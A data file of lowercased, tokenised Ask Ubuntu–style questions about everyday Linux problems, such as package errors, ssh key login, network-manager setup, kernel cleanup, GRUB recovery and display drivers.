437413	missing libssl3.so when trying to install flash debug player on ubuntu 13.10	when i try to install flash debug player in ubuntu 13.10 via the normal means , i get the following error : $ â sudo nspluginwrapper -v -i /usr/lib/adobe-flashplugin/libflashplayer.so *** nsplugin viewer *** error : libssl3.so : can not open shared object file : no such file or directory *** nsplugin viewer *** error : libssl3.so : can not open shared object file : no such file or directory nspluginwrapper : no appropriate viewer found for /usr/lib/adobe-flashplugin/libflashplayer.so the existing answers for this problem ( install ia32-libs ) does n't work of course , because that package has n't existed since multiarch was added a versions ago . what do i need to do to get this working on 13.10 ?
437414	read cpu serial , boot kernel only on match	i have been advised to come to you here . i 'd like to bind a kernel to a specific cpu 's serial number on a raspberry pi . the serial number is available at runtime to userland through /proc/cpuinfo and my kernel should only start on this machine . is there a way to add a single/multiple serials to a ( patched , i assume ) kernel source so that the compiled version only starts on that specific , `` whitelabelled '' machine ? i am well aware this is weak security , but every bit might help here . also the kernel carries certificates with it that userland uses later on to do the real crypto , this should only add another barrier against easy tampering . thanks for any ideas and pointers !
437415	ssh asks password when invoke it in script	i have one master and four slave computers . i generated rsa public/private key on master pc . then i copied publickey ( id_rsa.pub ) to slave machines as authorized_keys . it does n't ask password when i invoke ssh like this on master pc 's terminal : ssh –o userknownhostsfile=/dev/null –o stricthostkeychecking=no hduser @ slave1 i wrote this script to automatically login slave machines without asking password . server_list=`cat /home/hduser/slaves` # slave1 , slave2 ... username=hduser for host in $ server_list ; do ssh –t –o userknownhostsfile=/dev/null –o stricthostkeychecking=no -l $ { username } $ { host } ; done ssh is asking slaves passwords when i use this script . i 'm getting this message when use ssh with -vv option : i changed permissions on master pc and slave pc . sudo chmod 700 -r ~/.ssh sudo chown hduser ~/.ssh it still asking password . what am i missing ? how can i fix it ?
437423	delete the parent folder keeping the contained files ?	is it possible that if i have this : /folder1/folder2/folder3 /folder1/folder2/file1.txt can i delete folder2 but keep its content ? so the result would look like : /folder1/folder3 /folder1/file1.txt
437430	where are options of autofs documented in detail ?	http : //serverfault.com/questions/19323/is-it-feasible-to-have-home-folder-hosted-with-nfs i see the following conf from the above webpage . auto.master : +auto.master /mnt/nfs /etc/auto.home -- timeout=300 auto.home : home -rw , soft , timeo=5 , intr home.bzzprod.lan : /home could anybody let me know where to find the definitions of these options ? i think that -- timeout is from automount . but i do n't find a document on how to use the automount options in auto.master . where are -rw , soft , timeo , intr documented ? how to use hard mount instead ? thanks .
437433	how do you install network-manager on ubuntu server 13.10	here is the problem i am trying to solve . i have a little appliance like server . it has no ui , but i tend to move it around . sometimes i connect it with wifi and sometimes lan . right now i have configured all three ( wlan0 , p1p1 , p3p1 ) in /etc/network/interface to be dhcp . but that means the appliance takes a long time to boot . i poked around and people recommend using nmcli for servers like mine . it sounded like a good idea . i first tried installing it with the following command : sudo apt-get install network-manager however that was going to install a ton of packages , most of them looked gui related . so instead i tried the following command : sudo apt-get install network-manager -- no-install-recommends that worked great , it has a small package list , did n't seem to include a bunch of unnecessary gui packages . but now when i run nmcli : sudo nmcli c i get this : ** ( process:10709 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files error : nmcli ( 0.9.8.0 ) and networkmanager ( unknown ) versions do n't match . force execution using -- nocheck , but the results are unpredictable . well okay i can run -- nocheck : sudo nmcli -- nocheck c but now i get the following output : ** ( process:10738 ) : warning ** : could not initialize nmclient /org/freedesktop/networkmanager : the name org.freedesktop.networkmanager was not provided by any .service files error : ca n't obtain connections : settings service is not running . it is not running ? i tried to start it but there is no networkmanager in /etc/init.d is running nmcli on ubuntu server something people just recommend but have never tried ? it does not seem to work . per steeldriver i was able to start network-manager with sudo service network-manager start for some reason network-manager did not start on boot , probably had something to do with the interfaces being half configured in the /etc/network/interfaces file . once interfaces were removed from /etc/network/interfaces file machine boots quickly and network-manager uses dhcp to bring up the plugged in interfaces . however what i need to do is clone the mac address for one of the interfaces . i have a ubuntu laptop running 13.10 which i have done the same thing . i copied the file from the laptop to the appliance . but the appliance does not seem to detect the file . here is the file : /etc/networkmanager/system-connections/ethernet\ connection\ 1 [ 802-3-ethernet ] duplex=full cloned-mac-address=14 : da : e9 : b0:82 : d7 [ connection ] id=ethernet connection 1 uuid=da7dd579-235a-4588-a8ee-583d44a7b09d type=802-3-ethernet timestamp=1395512283 [ ipv6 ] method=auto [ ipv4 ] method=auto but now if i try to list this connection then i get no results for it : sudo nmcli c list name uuid type timestamp-real wired connection 1 e9765519-1188-4ef6-9153-77c8c99f59bf 802-3-ethernet sat 22 mar 2014 12:55:44 pm pdt and if i try to connect to the connection it tells me it does not exist . sudo nmcli c up uuid da7dd579-235a-4588-a8ee-583d44a7b09d error : unknown connection : da7dd579-235a-4588-a8ee-583d44a7b09d .
437436	pidgin suddenly not working w/ yahoo ( or vice versa ) ?	i 've been using pidgin ( pidgin 2.7.0-2.fc11 ( libpurple 2.7.0 ) 32fe1057ca848b424a0de8df380081e61a62db3b ) to login to my yahoo chat accounts for years , and everything was working fine until late afternoon yesterday . here 's what the debug window shows when i try to login now [ w/ minor formatting changes ] : ( 10:33:45 ) account : connecting to account [ elided ] . ( 10:33:45 ) connection : connecting . gc = 0x8e42eb0 ( 10:33:45 ) util : requesting to fetch a url ( 10:33:45 ) dns : dns query for 'vcs1.msg.yahoo.com ' queued ( 10:33:45 ) dns : wait for dns child 29720 failed : no child processes ( 10:33:45 ) dns : created new dns child 30605 , there are now 1 children . ( 10:33:45 ) dns : successfully sent dns request to child 30605 ( 10:33:45 ) dns : got response for 'vcs1.msg.yahoo.com ' ( 10:33:45 ) dnsquery : ip resolved for vcs1.msg.yahoo.com ( 10:33:45 ) proxy : attempting connection to 66.196.120.43 ( 10:33:45 ) proxy : connecting to vcs1.msg.yahoo.com:80 with no proxy ( 10:33:45 ) proxy : connection in progress ( 10:33:45 ) proxy : connecting to vcs1.msg.yahoo.com:80 . ( 10:33:45 ) proxy : connected to vcs1.msg.yahoo.com:80 . ( 10:33:45 ) util : request constructed ( 10:33:45 ) util : response headers : 'http/1.1 200 ok content-length : 17 content-type : text/plain ; charset=utf-8 cache-control : max-age=0 , must-revalidate expires : sun , 10 jun 2007 12:01:01 gmt ' ( 10:33:45 ) util : parsed 17 ( 10:33:45 ) yahoo : got colo capacity : 0 ( 10:33:45 ) yahoo : no cs address retrieved ! server response : colo_capacity=0 ( 10:33:45 ) connection : connection error on 0x8e42eb0 ( reason : 0 description : unable to connect : the server 's response did not contain the necessary information ) ( 10:33:45 ) account : disconnecting account trekliker ( 0x83a8418 ) ( 10:33:45 ) connection : disconnecting connection 0x8e42eb0 googling around shows this error might mean that yahoo does n't support the pidgin client , but i could n't find anything recent , so i assume that problem has been resolved .
437437	gui performance monitor tool	i need to monitor the performance of an ubuntu 12.04 machine . i am looking for a tool similar to perfmon on windows . i need something more interactive that using top from a terminal ; i am looking for something both interactive and gui-based . does anyone have suggestions ?
437442	change datetime format	i 'm using gnome 3 / gnome-shell , and ubuntu 13.10 . i 'd like to display the timestamp ( as in , the number of seconds since 1970/01/01 00:00 utc ) next to the clock in the top bar . i figured out i just needed to change the time format and add a % s . then i searched where i could change the time format and found dconf keys com.canonical.indicator.datetime.time-format and ... .custom-time-format . i set the second one to `` custom '' ( using dconf-editor ) and the first one to % l : % m % p - % s but nothing changed . actually , nothing in the whole dconf directory changed a single thing on the clock as i fiddled . ( nor did logging off and on again ) i thought that it may come for gnome-tweak-tool overriding the settings , but i do n't know how to make it use the standard parameters . when i change clock settings in gnome-tweak-tool , they 're immediately used . i 've tried everything i could find on google ... i 'm even wondering if it would not be simpler to create my own locale , but i 'm not even sure it will do the trick , as i do n't know what gnome-tweak-tool ( or some other software i 'm not even aware ) does to the clock ... thank you
437448	wacom tablet input area does n't match display area	after running a full-screen program with a different resolution than my display , my samsung slate does n't map its pen 's input correctly to the screen . this should be fixed by the map to monitor setting , but i do n't seem to have that option ( probably due to gnome3 ? ) . is there a way to do map to monitor from the terminal ?
437450	how to run a program using the nvidia card with bbswitch ?	i have a nvidia graphics card running with nouveau drivers which i keep disabled ( at boot ) using bbswitch in ubuntu 12.04 . bumblbee always kept the card on , so i uninstalled it , and installed the bbswitch module by downloading the source code and compiling , according to these instructions here https : //wenlong.wordpress.com/2012/05/01/disable-the-nvidia-discrete-graphic-card-in-a-nvidia-optimus-laptop/ how can i make sure that a program like a game is run using the nvidia card ? i do n't have problems with switching the card on or off using the terminal . i 'm a newbee so help is appreciated !
437453	why do some processes use swap and others do n't ?	i experience from time to time when i 'm working heavily , that my systems ( ubuntu 13.10 ) freezes . syslog says , that a process had to be killed to to memory shortage . killed process 4693 ( chromium-browse ) total-vm:1386284kb , anon-rss:31688kb , file-rss:3424kb that happens even if my swap is pretty much empty . i do have 4gb ram and 4gb swap partition . top says : kib mem : 3932056 total , 2828880 used kib swap : 4079612 total , 332492 used , so plenty of room available . but then i found out , that some processes are not using swap at all . they seem to eat all my physical ram without even considering swapping some pages to disk . i used `` top '' 's swap column to verify swap usage per process . these are e.g . chromium web browser and virtualbox . others , like firefox , netbeans , etc . are swapping . so who `` decides '' what process is swapping and which not ? from my understanding , this is done by the kernel , because from application perspective memory is memory without distinguishing between swap and physical ram . is that true or do the chromium developer have the application set to only use physical ram ? thanks for your help !
437455	could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ )	e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
437457	how to monitor fakeraid	i installed two disks on ubuntu as fakeraid . setup and everything is working fine . now i am trying to monitor them to send an email on drive failure . usually i do this with mdadm for software raids , but the fakeraid does n't seem to be recognized . : ~ $ cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] unused devices : < none > what is a good way of monitoring those disks for failure ?
437458	how can i use the default generic kernel in a uec ubuntu cloud image ?	i download a uec style ubuntu precise image from http : //cloud-images.ubuntu.com/ that i want to use in an openstack cloud , but i want to make some modifications to it before booting the vm . installing packages is fairly straight forward . i first mount precise-server-cloudimg-amd64.img and use apt-get after chroot-ing to the mounted folder . however , i also want to remove the default linux-image-virtual kernel ( and precise-server-cloudimg-amd64-vmlinuz-virtual ) and install and use the linux-image-generic one . how can i achieve this in a chroot environment that i have mounted the cloud image ?
437460	cursors storage location in ubuntu	where are cursor files ( .cur , .ani ) as in windows stored in ubuntu . i want to use the ubuntu cursors in windows . can i do that ?
437463	fan speed auto control does n't seem to work properly anymore ( too high )	it 's very annoying and i think it happened since last update , the fan of the cpu runs louder , that means probably faster than usual . it 's really the cpu and not the nvidia fan . i already tried some things . i modified grub config : grub_cmdline_linux_default= '' quiet splash acpi=force acpi_osi=linux '' grub_cmdline_linux= '' acpi_enforce_resources=lax '' i read that the first one is for buggy bios , the second one was an issue with it87 kernel module . sensors-detect wanted me to load this module , but it was not loadable ( modprobe it87 ended up with fatal : error inserting it87 , so the second line solved it ) i also cleaned the fan and the cpu , although they were not that dusty , but did n't help either . although i want to get auto detection running again , i also tried to control it by fancontrol . but unfortunately , this wo n't work . i get ... pwm 255 fan 0 fan stopped at pwm = 255 this fan appears to stop when the pwm is enabled ; perhaps the fan input shares a pin with the pwm output on the sensor chip . you can not control this fan with this pwm output . i already tried to load the previous kernel , but no result . by the way , my cpu usage is only at 4 % , so there are no heavy processes running . output of sensors ( i 'm not sure why those isa adapters have these strange values . maybe it 's a part of the problem ? ) $ sensors it8720-isa-0290 adapter : isa adapter in0 : +0.00 v ( min = +0.00 v , max = +4.08 v ) alarm in1 : +1.63 v ( min = +0.00 v , max = +4.08 v ) in2 : +0.54 v ( min = +0.00 v , max = +3.06 v ) +5v : +3.01 v ( min = +0.00 v , max = +4.08 v ) in4 : +4.08 v ( min = +0.00 v , max = +4.08 v ) alarm in5 : +4.08 v ( min = +0.00 v , max = +4.08 v ) alarm in6 : +4.08 v ( min = +0.00 v , max = +4.08 v ) alarm 5vsb : +3.95 v ( min = +0.00 v , max = +4.08 v ) vbat : +3.42 v fan1 : 3375 rpm ( min = 0 rpm ) fan2 : 1310 rpm ( min = 0 rpm ) fan3 : 1303 rpm ( min = 0 rpm ) temp1 : +40.0°c ( low = -1.0°c , high = +127.0°c ) sensor = thermistor temp2 : +38.0°c ( low = -1.0°c , high = -9.0°c ) sensor = thermistor temp3 : -128.0°c ( low = -1.0°c , high = +127.0°c ) sensor = disabled cpu0_vid : +0.613 v intrusion0 : ok k10temp-pci-00c3 adapter : pci adapter temp1 : +39.0°c ( high = +70.0°c ) ( crit = +90.0°c , hyst = +88.0°c ) any ideas ?
437464	terminating the terminal process for a particular outcome	for example consider the following situation : : i need to print some numbers randomly one after the other with a time interval of 5 seconds between each , and i need to terminate the terminal process of printing numbers if i encounter an output of '2 ' . is it possible . i know i could do the same in c , c++ , java , etc . etc , . but i would like to do it using bash script . note : : if only 'after ' i encounter an 'output ' of '2 ' ( or anything ) then the process needs to be terminated , i stress this because 'i need to terminate the terminal process for a particular outcome ' .
437465	empty build directory in custom compiled kernel	i have a script ( found here on github ) that custom compiles the 3.8 linux kernel ( with xenomai for real-time ) . the kernel compiles/installs/runs however when i try to install my graphics driver ( fglrx for ati radeon 8490 ) , i get the following error : /lib/modules/3.8.13.20-xenomai-2.6.3/build/include/generated/uapi/linux/version.h can not be found on this system . when i look into this directory ( /lib/modules/3.8.13.20-xenomai-2.6.3/build/ ) there is nothing there . i then ran an ls -l in /lib/modules/3.8.13.20-xenomai-2.6.3 and got the following output for the build directory : build - > /home/yapatel/dev/rtxi/scripts/linux-3.8.13 the directory that the build directory is pointing to was deleted as a part of the script for compiling/installing the custom kernel so this symbolic link is dead , which make sense as to why i am getting the error . i am compiling the custom kernel using the following command : fakeroot make-kpkg -- initrd -- append-to-version=-xenomai- $ xenomai_version kernel-image kernel-headers modules and then installing the compiled kernel using the following commands : sudo dpkg -i linux-image-*.deb sudo dpkg -i linux-headers*.deb sudo update-initramfs -c -k $ linux_version-xenomai- $ xenomai_version sudo update-grub now here is my question - i understood it as the above installation commands to take care of all the necessary pieces for installing a custom compiled kernel , however the deadlink to my build directory seems to suggest that i need to manually copy over the files from : /home/yapatel/dev/rtxi/scripts/linux-3.8.13 to /lib/modules/3.8.13.20-xenomai-2.6.3/build/ this seems like a manuall fix rather than the proper fix . is there a command i am missing in the compile/install process of my custom kernel ? i am assuming this means my kernel modules are not being installed ? all advice/help is appreciated !
437470	does a bittorrent transmission continue when a laptop suspends ?	in windows , while i lock the screen , the download files , still downloads in âľtorrent . but , if i close the lid ( probably it 'll get suspended ) , will the download complete ?
437471	screen problem in ubuntu 12.04 lts	since yesterday i am facing some problems with my laptop screen with ubuntu 12.04 lts , sometimes it works well but sometimes it keeps flickering and i see small squares everywhere on my screen . the screen flicker is like this . its small initially but suddenly covers the entire screen and ubuntu just freees . i need help in resolving the issue . any option suggested is welcome .
437472	how thunar know that my localized `` pobrane '' is `` download '' directory	i have xubuntu instaled ( with xfce ) and i have custom icon for `` pobrane '' ( and . download ) and that folder have always is my destination for download ( in web browser for instance ) . how ubuntu/xubuntu know that localized name is download directory ? where that information is saved ?
437474	how to uninstall programs in ubuntu if they are not in software center ? 12.04	i 've installed a program through the terminal , the program is cuttlefish . now i want to uninstall it and i ca n't find it in teh software center . how can i do it ? thanks !
437480	please help me fix my boot table usb hdd	when i use universal usb installer v1.9.4.0 to make win 8 bootable on my usb hdd problem is : syslinux error 0 when extracting file windows there problem is can not open output file u : \autorun.inf and then sources\install.wim and there is not enough space on the disk . my usb external hdd size 50gb why am i getting this error and how to fix this problem ? please help .
437482	remove apps from ubuntu live disk	i need to create a minimum ubuntu live system so as to save my usb stick space . how do i go about removing a few applications and installing replacements of few others . how do go about doing this . this system should also be installable to my hard-drive for permanent use later .
437487	missing file during download	i would like to try ubuntu but have downloaded it 3 times . each download ends with a note : missing file : language\p2grc.dll what do i do ?
437491	unbut 12.04 - problem with chrome & chromium since last update	two days ago , update manager said there were several pending updates . which i did n't check ( my bad ) and just went for it . left it updating all night . next day after rebooting , gnome desktop would n't show wallpapers nor icons . this helped me with that issue : problem after update : blue screen with only the mouse cursor but then i started using chrome , and it just hangs/freezes after a while . have reinstalled it several times ( remove , purge , delete ./config files , etc ) also , tried chromium with the same result ! my best guess , it 's a problem with ati video driver . $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rc410 [ radeon xpress 200/1100 ] which could be not working properly with the current ( updated ) kernel . $ uname -a linux smarthost 3.8.0-37-generic # 53~precise1-ubuntu smp wed feb 19 21:37:54 utc 2014 x86_64 x86_64 x86_64 gnu/linux but i 've tried login with latter kernel from grub , with same result . so i think maybe the update , also updated the driver ( or something similar ) . my motherboard is intel d102ggc2 with ati radeon xpress 200 video . so i downloaded proper driver for it at : http : //support.amd.com/en-us/download/desktop/legacy ? product=legacy1 & os=linux % 20x86_64 but could n't install it , because of this : ati technologies linux driver installer/packager error : ./default_policy.sh does not support version default : v2 : x86_64 : lib32 : :none:3.8.0-37-generic ; make sure that the version is being correctly set by -- iscurrentdistro removing temporary directory : fglrx-install.ejublw so i 'm stuck using firefox which is terrible slow ! any ideas anybody ? suggestions are welcome ! -- - edit -- - when running chrome from command line ( terminal ) and browsing nothing more than google 's homepage , i get this error in less than 5 minutes : $ /usr/bin/google-chrome-stable % u -- disable-gpu [ 18793:18793:0324/110657 : error : profile_sync_service.cc ( 1311 ) ] history delete directives datatype error was encountered : delete directives not supported with encryption . gkr-message : secret service operation failed : message did not receive a reply ( timeout by message bus ) [ 18793:18817:0324/111221 : error : native_backend_gnome_x.cc ( 475 ) ] keyring find failed : error al comunicarse con gnome-keyring-daemon killed on @ saiarcot895 's clue about using google sync ... i opened chrome once again from command line and tried to unsync my account . and as soon as i clic on the button to unlink my account , i get this other error : $ /usr/bin/google-chrome-stable % u -- disable-gpu [ 21573:21573:0324/140022 : error : profile_sync_service.cc ( 1311 ) ] history delete directives datatype error was encountered : delete directives not supported with encryption . [ 21573:21615:0324/140023 : error : download.cc ( 356 ) ] postclienttoservermessage ( ) failed during getupdates killed any ideas ?
437492	i 'm very new to linux and i 'm trying to install a game . i 've downloaded other-life .zip . extracted it . need help from there	i downloaded the game zip . i extracted it into my programs folder but i do n't know how to install it . on the website it says ... installing and using the client under linux : download el_ol_linux_193.zip and extract it into a new folder . set the execute bit on the executable programs ( *bin ) : chmod +x *bin copy the ol.x86.linux.bin file to the ol_linux folder to play other-life , double click on ol.x86.linux.bin to run on a 32 bit system , or ol.x86-64.linux.bin on a 64 bit system . the client will create a new config directory in ~ for other-life the folder will be ~/.olc scores , chatlogs , screenshots etc will be saved in ~/.olc/ . other-life uses ol.ini and ol.cfg for settings i right clicked on the ol.x86-64.linux.bin and its already checked on to be an executable program . but next in the steps it says copy to ol_linux but the file is already there ? i 'm very lost in the process . any help would be nice .
437495	new linux trojan virus ? `` hand of thief ''	with the new arrival of the trojan horse , dubbed `` hand of thief '' , should i consider installing some sort of anti-virus ( clam av for example ) or should the trojan be patched very soon ? just curious as to what i should do or even if i should be worrying . running ubuntu gnome edition if that matters .
437498	why is 'gvfs-mount ' not working after a force stop	'gvfs-mount ' does n't work after using a ctrl+z once and reusing 'gvfs-mount ' back again . consider the situation : : gvfs-mount smb : //172.17.88.47 password required for 172.17.88.47 user [ nanda ] : ^z [ 1 ] + stopped gvfs-mount smb : //172.17.88.47 gvfs-mount smb : //172.17.88.47 then it does n't work , it blinks , blinks and blinks but does n't work . why is this happenning ? but the command works after i quit terminal and start it again , then if i force stop it again it does n't work untill i restart terminal again .
437502	deactivate menu switching in top bar	is there a way of turning off the menu switching in the top bar ? for example , when i click on the clock , then move left or right , this switches to the other menus . another example is the volume control . i find this a little annoying because i often accidentally switch menus when i 'm not concentrating on moving the cursor straight down . it would be ideal if the opened menu would just stay opened until i press somewhere else . i 'm using ubuntu 13.10 64-bit . edit : now using ubuntu 14.04 64-bit , which has not changed anything and i also could n't find a way of disabling this .
437503	is symbolic link to ~/something dependent on logged user ?	if i run command : ln -s ~/user/relative/path /absolute/path and then log under different user , that does not have user/relative/path in it 's home directory , will the link be somehow broken or unreachable ? thank you for your answer : ) .
437506	ca n't boot live usb or cd on 2006 macmini running xubuntu	i had to install refit to boot a xubuntu 12.04.4 install cd originally . i chose to use the whole disk to install xubuntu . i need to reinstall due to some user errors , but now i ca n't boot any cd 's or live usb 's . i tried searching for how to install refit , but all the instructions are written for an osx install . my osx install disk was scratched beyond use a long time ago . i guess i could go find an osx iso online , but i would prefer not to . i think i might be sol on this one .
437507	password protect running apps	i have a little alarm clock installed , which limits my children 's computing time . it will ring , when the time is over . i want to protect that app with a password , as those little devils found out how to manipulate the time settings ( which is quite easy ) . i could n't find any alarm clock software , which offers this feature . is there a way to set a password for certain apps , or let them run inside a password protected container , or something like this ? greetings and thanks , kl p.s i dont want to encrypt my filesystem or make different user accounts for everybody .
437509	editing avi metadata	i know there are questions like this one but i tried other 's solutions but they did not work for me . this 'works ' : ffmpeg -i input.avi -metadata title= '' moonshine '' -metadata author= '' moonshine '' -metadata copyright= '' 2009 '' -metadata comment= '' foo '' -acodec copy -vcodec copy output.avi but the output file is 100 mb smaller than my input file and has only one audio track . it 's an episode from my dvd which i backed up with dvd : :rip . so how do i copy everything and just give it a title etc. ? also how do i give the audio tracks a name for example track 1 should be `` english '' and track 2 `` spanish '' ?
437513	ubuntu virtual machine slows down the entire home network	i installed xubuntu 13.10 in vmware workstation and when it 's on , other people using the same network say it 's being slow . i shut it down and then it 's fine . how can i fix this ?
437514	how to know if a lan share server is password protected	i know the traditional way of using ' gvfs-mount smb : //servername ' and if it asks for a password then we could say that it is password protected . but is there any direct way of finding it , i mean a direct answer like yes or no ?
437521	removing ubuntu cleanly	i want to uninstall ubuntu and revert to booting straight to windows . my pc wo n't let me restore to factory settings but i no longer want ubuntu on my laptop . i do have a recovery partition on my drive but i do not have a windows install disc . my windows os is win8 . any help would be appreciated
437522	two monitors with intel hd 4000 and module i915	i have installed ubuntu 13.10 desktop amd64 on an acer v5-472 . the laptop has the intel hd 4000 graphics chipset and a builtin 1366*768 display . when i boot with nomodeset , the internal display works fine , but i can not connect an external monitor ( well , i can connect it , but it is n't recognized ) . when i boot without nomodeset , the external monitor works , but the internal display does not . at the same time , my kernel log is spammed with [ drm : intel_dp_i2c_aux_ch ] *error* too many retries so for me it is now either or , but not both . i have tried various boot options found here . they all result in the same behavious : either external or internal , not both . the module i915 is loaded in both configurations and shows up in lsmod . could somebody help me how to configure my laptop , so i can use both displays ? ( same behaviour with xubuntu 13.10 , ubuntu 12.04 and ubuntu 12.10 ) dmesg is here .
437526	how do i remove / delete `` all video downloader `` ?	it 's not working for me and i did n't bother understanding why , simply removed it from ubuntu software centre where i previously got it from . now it 's still on the left-side bar with all the other icons . also , i 've gave a search in computer files ( /usr/share/applications/ ) it 's there but ca n't do anything please tell me if there 's a way to delete/erase apps on ubuntu without spending time on forums and googleing , must be a way .. many tahnks .
437528	authentication password on dell	i changed my user settings on my computer and i am no longer able to use my password . i am running ubuntu on an old dell i received that was being tossed out . how can i reset my password ?
437529	high capacity flash drives not recognised	my 8 year old computer running ubuntu with auto updates does not recognise flash drives greater than 16gb , how do i fix this ?
437533	nautilus opened minimized	when i open the directory of a file , nautilus is opened minimized . how can i make open in maximized as main window ?
437535	is it possible that i have more than one linux kernel installed ?	i was reading this . it 's about detecting installed kernels . kernels ? ? ? ! ! is it possible that i have more than a kernel ? ? how is that ? ? ! ! ! ! ! ... so i followed the command in the instructions and this is my output : username @ hostname : ~ $ dpkg -- list | grep linux-image rc linux-image-3.11.0-12-generic 3.11.0-12.19 i386 linux kernel image for version 3.11.0 on 32 bit x86 smp ii linux-image-3.11.0-13-generic 3.11.0-13.20 i386 linux kernel image for version 3.11.0 on 32 bit x86 smp ii linux-image-3.11.0-14-generic 3.11.0-14.21 i386 linux kernel image for version 3.11.0 on 32 bit x86 smp ii linux-image-3.11.0-15-generic 3.11.0-15.25 i386 linux kernel image for version 3.11.0 on 32 bit x86 smp ii linux-image-3.11.0-17-generic 3.11.0-17.31 i386 linux kernel image for version 3.11.0 on 32 bit x86 smp ii linux-image-3.11.0-18-generic 3.11.0-18.32 i386 linux kernel image for version 3.11.0 on 32 bit x86 smp rc linux-image-3.8.0-19-generic 3.8.0-19.30 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.8.0-25-generic 3.8.0-25.37 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.8.0-26-generic 3.8.0-26.38 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.8.0-27-generic 3.8.0-27.40 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.8.0-30-generic 3.8.0-30.44 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-3.8.0-31-generic 3.8.0-31.46 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.11.0-12-generic 3.11.0-12.19 i386 linux kernel extra modules for version 3.11.0 on 32 bit x86 smp ii linux-image-extra-3.11.0-13-generic 3.11.0-13.20 i386 linux kernel extra modules for version 3.11.0 on 32 bit x86 smp ii linux-image-extra-3.11.0-14-generic 3.11.0-14.21 i386 linux kernel extra modules for version 3.11.0 on 32 bit x86 smp ii linux-image-extra-3.11.0-15-generic 3.11.0-15.25 i386 linux kernel extra modules for version 3.11.0 on 32 bit x86 smp ii linux-image-extra-3.11.0-17-generic 3.11.0-17.31 i386 linux kernel extra modules for version 3.11.0 on 32 bit x86 smp ii linux-image-extra-3.11.0-18-generic 3.11.0-18.32 i386 linux kernel extra modules for version 3.11.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-19-generic 3.8.0-19.30 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-25-generic 3.8.0-25.37 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-26-generic 3.8.0-26.38 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-27-generic 3.8.0-27.40 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-30-generic 3.8.0-30.44 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-extra-3.8.0-31-generic 3.8.0-31.46 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp ii linux-image-generic 3.11.0.18.19 i386 generic linux kernel image username @ hostname : ~ $ woah ! hold on a second ! ! so those things are kernels ? ? ? ! ! and i had all that in my system and i did n't know ? ? ! i did n't install anything ! ! or maybe it 's the update manager that did this ? ... ... ... if it 's true then do i need all this ? ? if no then it should be taking up lots of space of my drive ! ! and then how do i clean up ? ? please explain as much details as possible ! it seems that there 's a lot that i do n't understand !
437536	wifi is connected , but ca n't use internet	my laptop shows that its connected but when i launch mozilla it does n't load . when i use a wired connection it works . any help ?
437545	grub rescue is stuck	i installed ubuntu 12.04 . i erased a grub file by mistake , now grub rescue does n't let me do anything . i used boot repair , and now my pc is stuck at : error : invalid arch independent elf magic . grub rescue > i used boot repair , but it looks like my laptop ca n't detect my usb drive , also i ca n't access the bios .
437549	should i install ubuntu 12.04 lts on my computer ?	my old computer has a plentium d 915 , 2.80hz and 2gb of ram ... i thought of installing ubuntu 12.04 lts but i 'm afraid that this version would slow my pc down . should i give it a try or install something else ( xubuntu ) ?
437554	i do n't seem to have iwlconfig on my kernel	i recently compiled a linux 3.0 kernel from the latest stable ubuntu release ( kernel 3.2.0 i believe ) following all the steps you can see in this page : http : //www.explodingpenguin.tv/2011/06/07/installcompile-linux-kernel-3-0-in-ubuntu/ the steps were easy to follow and correctly explained for a new linux user like me . while executing this command : make localmodconfig everything seems to be copied correctly except for one thing : iwlwifi config not found ! ! # configuration written to .config # i 've tried everything from downloading the firmware i need ( iwlwifi-5000 if i recall correctly ) , to recompiling the kernel a second time , with the same results . everything else works perfectly , but this little detail prevents me from researching about linux drivers on the internet while i 'm making my own . help ?
437555	creating wine shortcuts	while attempting to create a desktop shortcut for an app that uses wine i came up with this error : failed to execute child process `` /home/fiver/.wine/drive_c/program '' ( no such file or directory ) i have followed all the instrutions at jaypeeonline.net
437558	start uget as superuser ( administrator ) from launcher icon	i have recently noticed that , to enable the option `` shutdown when downloads complete '' in uget i have to start it from terminal with sudo uget-gtk is there a way to always start uget as a superuser ( root ) by clicking the icon of uget in launcher .
437560	update not working , nothing is installing in ubuntu 12.04	i am very much new to linux . i 'm using ubuntu 12.04 . the problem is that i 'm unable to install anything on it . initially when i installed it , it was fine . but i was having some dependency problem with a package so i followed quite many tips to solve that issue . since then i am getting errors ( posted below ) whenever i run sudo apt-get update command . can anyone help me solving this problem ? i 'm really in need . i could n't install anything due to this issue . software center has no install option when i select some software and when i try in terminal it always gives error : e : unable to locate package xyz err http : //us.archive.ubuntu.com precise release.gpg could not connect to 192.168.10.9:8080 ( 192.168.10.9 ) , connection timed out err http : //us.archive.ubuntu.com precise-updates release.gpg unable to connect to 192.168.10.9:8080 : . . . . reading package lists ... done . . . w : some index files failed to download . they have been ignored , or old ones used instead .
